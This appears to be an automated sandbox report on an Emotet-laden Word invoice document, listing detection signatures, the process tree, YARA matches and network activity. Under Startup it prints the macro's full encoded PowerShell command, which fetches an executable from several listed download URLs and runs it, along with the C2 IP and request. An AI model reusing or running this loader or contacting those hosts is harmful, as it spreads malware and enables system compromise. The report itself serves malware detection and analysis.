Loading ...

Play interactive tourEdit tour

Analysis Report Fakturierung_24_09_2020_8415803921.doc

Overview

General Information

Sample Name:Fakturierung_24_09_2020_8415803921.doc
Analysis ID:289687
MD5:799f8b65f4144c1a628de3e86198ece4
SHA1:75067cb881a867d47ff12437db1765c95bd1d9e9
SHA256:029de7c595a68b46233e28bbff65f065f8baf48178b6998928ebadafb8d3368c
Tags:Heodo

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
PowerShell case anomaly found
Powershell drops PE file
Very long command line found
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 7164 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • powershell.exe (PID: 6580 cmdline: POwersheLL -ENCOD JABLAGIANwBoADcAeQAyAD0AKAAnAEsANQAnACsAKAAnAHUAaQBiADQAJwArACcAOAAnACkAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUATgBWADoAVQBTAGUAcgBQAHIAbwBmAEkATABlAFwAWQBnADkAawBfADkAdABcAG8AYQBkADcAMABkAFMAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAFIARQBDAFQAbwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBgAEMAdQBSAGkAYABUAFkAYABwAFIATwBUAG8AYABjAE8ATAAiACAAPQAgACgAJwB0AGwAJwArACcAcwAxACcAKwAoACcAMgAnACsAJwAsACAAdAAnACkAKwAoACcAbABzADEAMQAnACsAJwAsACAAdAAnACsAJwBsAHMAJwApACkAOwAkAEEAYwBlAHoAawA1ADIAIAA9ACAAKAAnAFgAYQAnACsAJwBnACcAKwAoACcAbgAnACsAJwBhADYAJwArACcAOQB5ADgAJwApACkAOwAkAEgAMgBkAGUAZQA5AHUAPQAoACgAJwBJAGkAJwArACcAMAAnACkAKwAoACcAdQAnACsAJwBiAGsAJwApACsAJwBxACcAKQA7ACQAUABwAHgANgAyAGgAYQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAKAAnAEQAVQBtACcAKwAnAFkAZwAnACkAKwAoACcAOQAnACsAJwBrAF8AJwApACsAJwA5ACcAKwAoACcAdABEACcAKwAnAFUAbQBPAGEAZAA3ADAAZAAnACsAJwBzACcAKQArACgAJwBEACcAKwAnAFUAbQAnACkAKQAuACIAUgBgAEUAUABMAGEAYwBlACIAKAAoACcARAAnACsAJwBVAG0AJwApACwAWwBzAHQAcgBJAG4AZwBdAFsAYwBoAEEAUgBdADkAMgApACkAKwAkAEEAYwBlAHoAawA1ADIAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABXAGYAbwBrAGoAMgBkAD0AKAAnAFoAJwArACcAMAAnACsAKAAnADgAZgBzAHUAJwArACcAZQAnACkAKQA7ACQATQBzAF8AcQB3AHQAcwA9ACYAKAAnAG4AZQB3AC0AbwBiAGoAJwArACcAZQBjACcAKwAnAHQAJwApACAATgBFAFQALgBXAEUAQgBDAGwAaQBFAG4AVAA7ACQAUQBwADgAdgBrAGYAcwA9ACgAKAAnAGgAJwArACcAdAB0AHAAJwApACsAKAAnADoALwAvACcAKwAnAGYAdQBsACcAKQArACgAJwBmAGkAJwArACcAbABsACcAKQArACcAbQAnACsAKAAnAGUAbgB0ACcAKwAnAGUAbgAnACsAJwB0ACcAKwAnAGUAcgAnACsAJwB0AGEAaQBuAG0AZQBuAHQALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAJwAvACcAKwAoACcAYwBnAGkALQBiACcAKwAnAGkAbgAnACkAKwAoACcALwAnACsAJwBXAHIARAAvACcAKwAnACoAJwApACsAJwBoACcAKwAoACcAdAB0ACcAKwAnAHAAcwAnACkAKwAnADoAJwArACgAJwAvAC8AJwArACcAdwB3AHcALgAnACkAKwAoACcAZwBlAHQAdwBhACcAKwAnAHkAaQBtACcAKwAnAG0AJwApACsAJwBpAGcAJwArACgAJwByAGEAdABpACcAKwAnAG8AbgAuAGMAJwArACcAbwBtACcAKwAnAC8AdgBxAGcAJwArACcAMQAnACsAJwBqADMALwAnACkAKwAnADEAJwArACgAJwBCAHcAJwArACcAYgBaAE4ATgAvACoAJwArACcAaAAnACkAKwAoACcAdAAnACsAJwB0AHAAJwApACsAKAAnADoALwAvACcAKwAnAHYAaQBkAGEAZABvACcAKwAnAGgAbwBtAGUAbQAuAGMAbwAnACsAJwBtAC8AJwApACsAJwB3AHAAJwArACcALQAnACsAJwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACsAJwB0ACcAKwAoACcALwAnACsAJwBPADIAaQByADMAJwApACsAKAAnAHYAeAAvACcAKwAnACoAaAAnACsAJwB0AHQAJwApACsAJwBwADoAJwArACcALwAvACcAKwAnAGEAJwArACgAJwBuACcAKwAnAGEAbAAnACkAKwAnAHkAJwArACgAJwB0AGkAJwArACcAYwAnACkAKwAnAHMAJwArACgAJwBjAG8AcwBtACcAKwAnAC4AJwArACcAYwAnACsAJwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8AJwApACsAKAAnAFAAdwAnACsAJwBsACcAKQArACgAJwBNAHkAJwArACcALwAqAGgAdAAnACkAKwAnAHQAJwArACgAJwBwADoAJwArACcALwAnACsAJwAvAHcAdwB3AC4AYQAnACkAKwAnAG4AZwAnACsAKAAnAGkAYQB0ACcAKwAnAGgAJwArACcAaQBuACcAKQArACgAJwBoAC4AJwArACcAYwBvACcAKwAnAG0ALwB3ACcAKQArACcAcAAtACcAKwAoACcAYQBkACcAKwAnAG0AaQBuAC8AJwArACcASwAnACkAKwAnAHAATgAnACsAJwBmAEsAJwArACcALwAqACcAKwAoACcAaAB0AHQAJwArACcAcAA6ACcAKQArACcALwAnACsAKAAnAC8AdAAnACsAJwB3ACcAKwAnAG8AcABhAHIAcgAnACsAJwBvAHQALgBjACcAKQArACcAbwAnACsAJwBtAC8AJwArACgAJwB3ACcAKwAnAHAALQAnACkAKwAoACcAaQBuACcAKwAnAGMAbAB1AGQAZQAnACsAJwBzAC8AJwApACsAJwBzADcAJwArACcAYQBHACcAKwAnAHYAJwArACgAJwAvACcAKwAnACoAJwArACcAaAB0AHQAcAAnACsAJwA6AC8ALwBpAGUAZQBlACcAKwAnAC0AYQBjAHQAcwAuACcAKwAnAGMAbwAnACsAJwBtAC8AJwApACsAKAAnAG0AYQAnACsAJwBpACcAKQArACgAJwBuAHAAJwArACcAYQAnACkAKwAoACcAZwBlAC8AdgAnACsAJwBHAC8AJwApACkALgAiAFMAYABwAGwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQASABzAG4AXwBuAGwAMQA9ACgAJwBSACcAKwAnAHEAcgAnACsAKAAnAHkANAAnACsAJwBuADAAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABQAHkAOQBmAHUAMABlACAAaQBuACAAJABRAHAAOAB2AGsAZgBzACkAewB0AHIAeQB7ACQATQBzAF8AcQB3AHQAcwAuACIAZABgAG8AdwBuAGAATABvAEEAZABGAEkAbABFACIAKAAkAFAAeQA5AGYAdQAwAGUALAAgACQAUABwAHgANgAyAGgAYQApADsAJABYAHUAXwAzAGoAdwBlAD0AKAAoACcAUQA0ACcAKwAnAGYAZgAnACsAJwBhAHAAJwApACsAJwBlACcAKQA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABQAHAAeAA2ADIAaABhACkALgAiAEwAYABlAG4ARwB0AGgAIgAgAC0AZwBlACAAMwA1ADIAMAA0ACkAIAB7AC4AKAAnAEkAJwArACcAbgB2AG8AawBlAC0AJwArACcASQB0AGUAbQAnACkAKAAkAFAAcAB4ADYAMgBoAGEAKQA7ACQAVABqAHQAOQBxAGUAdQA9ACgAKAAnAFQAJwArACcAeAA0AGoAcAAnACkAKwAnAHMAdwAnACkAOwBiAHIAZQBhAGsAOwAkAEEAaQA5AHYAbQAwAHoAPQAoACcAVgAnACsAKAAnAG0AdQAnACsAJwBmAHUAeABqACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABTAHQAYwBlAHEAMAByAD0AKAAoACcASwBtACcAKwAnAHQAJwApACsAKAAnAF8AbAAnACsAJwBrACcAKQArACcAaQAnACkA MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Xagna69y8.exe (PID: 6068 cmdline: 'C:\Users\user\Yg9k_9t\Oad70ds\Xagna69y8.exe' MD5: 665B60253D9AEBAD942CAC6670594419)
      • RTMediaFrame.exe (PID: 5416 cmdline: C:\Windows\SysWOW64\iedkcs32\RTMediaFrame.exe MD5: 665B60253D9AEBAD942CAC6670594419)
  • svchost.exe (PID: 6920 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5680 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6540 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5308 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6492 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 4280 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6000 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 6016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6908 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.470373056.0000000000600000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000004.00000002.220109967.00000000006D1000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000005.00000002.471107407.00000000021B4000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000004.00000002.220261795.0000000002084000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000005.00000002.471152467.00000000021D1000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.Xagna69y8.exe.6d0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              5.2.RTMediaFrame.exe.21d0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security

                Sigma Overview

                No Sigma rule has matched

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Multi AV Scanner detection for domain / URLShow sources
                Source: fulfillmententertainment.comVirustotal: Detection: 13%Perma Link
                Source: http://fulfillmententertainment.com/cgi-bin/WrD/Virustotal: Detection: 16%Perma Link
                Multi AV Scanner detection for submitted fileShow sources
                Source: Fakturierung_24_09_2020_8415803921.docReversingLabs: Detection: 25%
                Machine Learning detection for sampleShow sources
                Source: Fakturierung_24_09_2020_8415803921.docJoe Sandbox ML: detected
                Source: C:\Windows\SysWOW64\iedkcs32\RTMediaFrame.exeCode function: 5_2_021D25C0 CryptCreateHash,CryptGenKey,CryptAcquireContextW,CryptDecodeObjectEx,CryptDecodeObjectEx,CryptImportKey,LocalFree,5_2_021D25C0
                Source: C:\Windows\SysWOW64\iedkcs32\RTMediaFrame.exeCode function: 5_2_021D2210 CryptExportKey,CryptEncrypt,CryptDestroyHash,GetProcessHeap,RtlAllocateHeap,CryptGetHashParam,memcpy,CryptDuplicateHash,5_2_021D2210
                Source: C:\Windows\SysWOW64\iedkcs32\RTMediaFrame.exeCode function: 5_2_021D1FA0 CryptDuplicateHash,memcpy,CryptVerifySignatureW,CryptDestroyHash,CryptDecrypt,5_2_021D1FA0
                Source: C:\Windows\SysWOW64\iedkcs32\RTMediaFrame.exeCode function: 5_2_021D3810 FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,_snwprintf,GetProcessHeap,HeapFree,FindClose,FindClose,5_2_021D3810
                Source: global trafficDNS query: name: fulfillmententertainment.com
                Source: global trafficTCP traffic: 192.168.2.4:49717 -> 208.91.199.181:80
                Source: global trafficTCP traffic: 192.168.2.4:49717 -> 208.91.199.181:80
                Source: global trafficHTTP traffic detected: GET /cgi-bin/WrD/ HTTP/1.1Host: fulfillmententertainment.comConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 174.106.122.139 174.106.122.139
                Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                Source: global trafficHTTP traffic detected: POST /ZJQGwOVb6As6GLXS/m4SIbRsGYzt8Su8LNC/Sas6zvJy9/BRm4jLBzCUf8z6/NiMNi69PdZS/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 174.106.122.139/ZJQGwOVb6As6GLXS/m4SIbRsGYzt8Su8LNC/Sas6zvJy9/BRm4jLBzCUf8z6/NiMNi69PdZS/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------------------SP0gfURncLtpIKafyjbpHost: 174.106.122.139Content-Length: 4612Cache-Control: no-cache
                Source: unknownTCP traffic detected without corresponding DNS query: 174.106.122.139
                Source: unknownTCP traffic detected without corresponding DNS query: 174.106.122.139
                Source: unknownTCP traffic detected without corresponding DNS query: 174.106.122.139
                Source: unknownTCP traffic detected without corresponding DNS query: 174.106.122.139
                Source: unknownTCP traffic detected without corresponding DNS query: 174.106.122.139
                Source: unknownTCP traffic detected without corresponding DNS query: 174.106.122.139
                Source: unknownTCP traffic detected without corresponding DNS query: 174.106.122.139
                Source: C:\Windows\SysWOW64\iedkcs32\RTMediaFrame.exeCode function: 5_2_021D2920 InternetReadFile,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,HttpQueryInfoW,5_2_021D2920
                Source: global trafficHTTP traffic detected: GET /cgi-bin/WrD/ HTTP/1.1Host: fulfillmententertainment.comConnection: Keep-Alive
                Source: unknownDNS traffic detected: queries for: fulfillmententertainment.com
                Source: unknownHTTP traffic detected: POST /ZJQGwOVb6As6GLXS/m4SIbRsGYzt8Su8LNC/Sas6zvJy9/BRm4jLBzCUf8z6/NiMNi69PdZS/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 174.106.122.139/ZJQGwOVb6As6GLXS/m4SIbRsGYzt8Su8LNC/Sas6zvJy9/BRm4jLBzCUf8z6/NiMNi69PdZS/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------------------SP0gfURncLtpIKafyjbpHost: 174.106.122.139Content-Length: 4612Cache-Control: no-cache
                Source: RTMediaFrame.exe, 00000005.00000002.473218289.0000000002CF0000.00000004.00000001.sdmp, RTMediaFrame.exe, 00000005.00000002.473243315.0000000002CF5000.00000004.00000001.sdmpString found in binary or memory: http://174.106.122.139/ZJQGwOVb6As6GLXS/m4SIbRsGYzt8Su8LNC/Sas6zvJy9/BRm4jLBzCUf8z6/NiMNi69PdZS/
                Source: RTMediaFrame.exe, 00000005.00000002.473218289.0000000002CF0000.00000004.00000001.sdmpString found in binary or memory: http://174.106.122.139/ZJQGwOVb6As6GLXS/m4SIbRsGYzt8Su8LNC/Sas6zvJy9/BRm4jLBzCUf8z6/NiMNi69PdZS/Y
                Source: RTMediaFrame.exe, 00000005.00000002.473218289.0000000002CF0000.00000004.00000001.sdmpString found in binary or memory: http://174.106.122.139/ZJQGwOVb6As6GLXS/m4SIbRsGYzt8Su8LNC/Sas6zvJy9/BRm4jLBzCUf8z6/NiMNi69PdZS/e
                Source: svchost.exe, 0000000A.00000002.472449921.000002A34EE14000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                Source: svchost.exe, 0000000A.00000002.472449921.000002A34EE14000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                Source: svchost.exe, 0000000A.00000002.472800789.000002A34EE9F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
                Source: svchost.exe, 0000000A.00000002.472883063.000002A34F000000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
                Source: svchost.exe, 0000000D.00000002.303900237.000002041B613000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://api.aadrm.com/
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://api.diagnostics.office.com
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://api.microsoftstream.com/api/
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://api.office.net
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://api.onedrive.com
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://apis.live.net/v5.0/
                Source: svchost.exe, 0000000D.00000003.303701495.000002041B661000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://augloop.office.com
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://cdn.entity.
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://clients.config.office.net/
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://config.edge.skype.com
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://cortana.ai
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://cr.office.com
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://dataservice.o365filtering.com
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://dataservice.o365filtering.com/
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
                Source: svchost.exe, 0000000D.00000003.303716565.000002041B65A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 0000000D.00000003.303716565.000002041B65A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                Source: svchost.exe, 0000000D.00000003.303701495.000002041B661000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                Source: svchost.exe, 0000000D.00000002.303932710.000002041B63D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                Source: svchost.exe, 0000000D.00000003.303716565.000002041B65A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                Source: svchost.exe, 0000000D.00000003.303701495.000002041B661000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                Source: svchost.exe, 0000000D.00000003.303677764.000002041B649000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
                Source: svchost.exe, 0000000D.00000003.303716565.000002041B65A000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                Source: svchost.exe, 0000000D.00000003.303701495.000002041B661000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                Source: svchost.exe, 0000000D.00000002.303932710.000002041B63D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                Source: svchost.exe, 0000000D.00000003.303701495.000002041B661000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                Source: svchost.exe, 0000000D.00000003.303701495.000002041B661000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                Source: svchost.exe, 0000000D.00000003.303701495.000002041B661000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                Source: svchost.exe, 0000000D.00000003.303753706.000002041B641000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                Source: svchost.exe, 0000000D.00000003.303753706.000002041B641000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                Source: svchost.exe, 0000000D.00000003.303701495.000002041B661000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                Source: svchost.exe, 0000000D.00000003.303731458.000002041B640000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://devnull.onenote.com
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://directory.services.
                Source: svchost.exe, 0000000D.00000003.303716565.000002041B65A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                Source: svchost.exe, 0000000D.00000003.303716565.000002041B65A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                Source: svchost.exe, 0000000D.00000003.303716565.000002041B65A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                Source: svchost.exe, 0000000D.00000003.303677764.000002041B649000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                Source: svchost.exe, 0000000D.00000003.303701495.000002041B661000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                Source: svchost.exe, 0000000D.00000002.303932710.000002041B63D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 0000000D.00000003.281922391.000002041B632000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
